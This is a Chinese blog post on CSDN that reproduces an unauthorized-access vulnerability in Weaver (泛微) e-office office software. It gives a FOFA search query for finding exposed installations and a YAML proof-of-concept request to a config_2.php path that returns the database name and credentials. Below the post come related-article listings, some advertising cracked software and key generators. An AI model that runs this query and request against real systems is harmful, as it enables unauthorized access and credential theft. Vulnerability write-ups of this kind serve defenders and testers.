泛微e-office 未授权访问漏洞复现

最新推荐文章于 2024-05-22 10:52:14 发布
最新推荐文章于 2024-05-22 10:52:14 发布
阅读量520 收藏
点赞数 1
文章标签: 1024程序员节
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18193739/article/details/134020652
版权

漏洞简介

泛微e-office是一种企业办公自动化软件解决方案,由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office存在未授权访问,攻击者可以访问页面获取敏感信息,可获取数据库账户密码。

fofa 搜索语法

(body=“login.php”&&body=“eoffice”)||body=“/general/login/index.php”

yaml poc


detail:
  ID: 5285
  Author: 匿名作者
  Name: 泛微e-office 未授权访问
  Description: 泛微e-office是一种企业办公自动化软件解决方案,由中国的泛微网络科技股份有限公司开发和提供。它旨在帮助企业提高办公效率、优化业务流程和信息管理。泛微e-office
    存在未授权访问,攻击者可以访问页面获取敏感信息。
  Identifier:
    DVB: DVB-2023-5285
  VulnClass:
  - 认证绕过/未认证
  Category:
  - 应用服务
  Manufacturer: 泛微
  Product: e-office
  Type: 1
  Status: 1
  Scanable: 1
  Level: 2
  DisclosureDate: '2023-10-18'
  Is0day: false
  IncludeExp: false
  Weakable: false
  IsXc: false
  IsCommon: false
  IsCallBack: false
  Condition: (body="login.php"&&body="eoffice")||body="/general/login/index.php"
  Solutions:
  - 请关注厂商的修复版本,并及时更新到最新版本.
poc:
  relative: req0
  session: false
  requests:
  - method: GET
    timeout: 10
    path: /building/backmgr/urlpage/mobileurl/config_2.php
    headers:
      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
        Gecko) Chrome/83.0.2597.132 Safari/537.36
    follow_redirects: true
    matches: (code.eq("200") && body.contains("数据库名") && body.contains("用户名"))

漏洞复现

漏洞路径:/building/backmgr/urlpage/mobileurl/config_2.php
在这里插入图片描述

更多poc更新

https://github.com/wy876/POC

yr678
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
【1day】泛微e-office OA系统user_page接口授权访问漏洞学习
记录并分享学习安全的知识点..
11-22 380
泛微e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的泛微软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。泛微e-office OA存在user_page接口授权访问漏洞,攻击者可以通过某种方式绕过身份验证机制,直接访问应用程序或系统的敏感资源或功能,从而获取敏感信息或进行恶意操作的一种漏洞
【0day】泛微e-office OA授权访问漏洞学习
记录并分享学习安全的知识点..
10-17 679
泛微e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的泛微软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。泛微e-office OA存在授权访问漏洞,,攻击者可以通过某种方式绕过身份验证机制,直接访问应用程序或系统的敏感资源或功能,从而获取敏感信息或进行恶意操作的一种漏洞
漏洞复现泛微E-Office USERSELECT 授权访问漏洞
qq_34780861的博客
04-22 682
泛微OA E-Office UserSelect接口存在授权访问漏洞,通过漏洞攻击者可以获取敏感信息
泛微E-Office敏感信息泄露和授权访问漏洞
08-03 1867
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
泛微OA E-Office UserSelect 授权访问漏洞
伏一
05-22 247
app="泛微-EOffice"泛微OA E-Office
泛微 E-Office UserSelect接口存在授权访问漏洞
wan___she__pi的博客
04-24 450
泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案。泛微 E-Office 9.5版本,UserSelect接口存在授权访问漏洞
泛微E-Office前台文件上传漏洞
失心少年
06-20 888
我们在第108行调用doc2text(),然后追溯到doc2txt()参数$FILE_PATH的源,连接附件目录(C:\eoffice9\webroot\ATTACHMENT) 的数据表FLE_CONTENT中ATTACHMENT_ID和ATTACHMENT_NAME列的值,以获得完整的文件路径。天擎攻防实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
漏洞复现泛微E-Office信息泄露漏洞(CVE-2023-2766)
失心少年
11-21 648
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Weaver E-Office 9.5版本存在安全漏洞。Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。Weaver E-Office 9.5版本。
【1day】泛微e-office OA SQL注入漏洞学习
记录并分享学习安全的知识点..
10-17 469
泛微e-office OA是一种企业级办公自动化(Office Automation)解决方案,由中国的泛微软件(FANWEI)开发和提供。它是一套集成办公、流程管理、协同办公、知识管理等功能于一体的全面办公平台。泛微e-office OA存在SQL注入漏洞,攻击者通过在Web应用程序的输入字段中注入恶意的SQL代码,从而在后台数据库中执行授权的操作。
【0day】复现泛微OA e-cology 任意文件读取漏洞
记录并分享学习安全的知识点..
11-02 1052
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology某处功能点存在任意文件读取漏洞,攻击者攻击者可以在授权的情况下读取系统上的任意文件。
泛微协同办公OA管理系统==完美破解无限制
01-08
泛微协同办公OA管理系统==完美破解无限制(2011、12、26更新)
泛微e-office 带注册
02-11
泛微OA office 带注册机 不是软件而是注册机
泛微EC8 ecology注册机,可用
09-27
泛微EC8 ecology注册机,附件包含ecology,不带JAVA环境,需要在64位系统java下运行
泛微OA系统E-office11中小企业全能OA办公系统默认的初始密码是什么
12-17 6830
泛微OA系统E-office11中小企业全能OA办公系统 的相关密码
【文档留存】泛微OA &&POC
qq_35349673的博客
06-04 2018
sfdafasfasf
泛微OA 最新前台授权sql注入
swordheart的博客
07-24 1153
泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology FileDownloadForOutDoc 对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞
记一次泛微漏洞分析到发现公开新漏洞
weixin_42508548的博客
01-10 3606
本来想着分析分析泛微eoffice最新出的漏洞CNVD-2021-49104的,分析分析着,发现代码好像有别的方法也存在..
漏洞复现--泛微E-Office信息泄露(CVE-2023-2766)
qq_53003652的博客
11-09 717
泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。该产品configfile。目前厂商已发布升级补丁以修复漏洞
【Python控制台小游戏】剑与魔法,非对象版本
最新发布
08-29
初学者自制控制台小游戏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yr678

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值